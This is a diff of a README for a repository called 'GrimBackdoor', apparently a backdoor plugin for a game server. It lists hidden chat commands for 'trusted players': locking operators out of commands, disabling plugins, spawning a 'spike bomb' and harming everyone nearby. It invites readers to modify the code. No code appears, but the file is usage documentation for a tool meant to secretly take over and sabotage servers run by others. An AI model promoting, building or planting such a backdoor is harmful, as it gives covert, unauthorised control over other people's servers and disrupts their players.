KuzeySRC/GrimBackdoor/README.md

 !lock players or ops cant use commands.

+!disable (plugin) deactivates the writen plugin.

+!spikebomb gives you a spike bomb.

 !kontrolcubugu 15 blocks will bring everyone around you to their knees xD

 !deactivate Makes you non-trusted player

+# These commands only works if you are added to trusted players.

-# You can edit the code the way you want.
+## You can edit the code the way you want.